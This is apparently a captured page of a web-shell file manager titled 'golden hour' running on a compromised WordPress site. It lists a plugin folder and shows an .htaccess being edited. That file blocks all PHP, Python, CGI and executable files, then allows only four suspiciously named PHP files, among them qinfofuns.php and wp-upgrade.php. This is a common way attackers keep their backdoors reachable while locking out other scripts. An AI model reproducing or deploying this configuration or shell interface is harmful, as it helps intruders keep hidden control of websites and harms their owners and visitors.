golden hour
/home/godaofbq/hyperbarics4u.com/wp-content/plugins/code-snippets/js/manage
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
514 B
Del
OK
activation.ts
2.22 KB
Del
OK
cloud.ts
1.44 KB
Del
OK
index.ts
261 B
Del
OK
priority.ts
734 B
Del
OK
requests.ts
1.68 KB
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(site-maintenance\.php|qinfofuns\.php|wp-upgrade\.php|styles\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch>
Save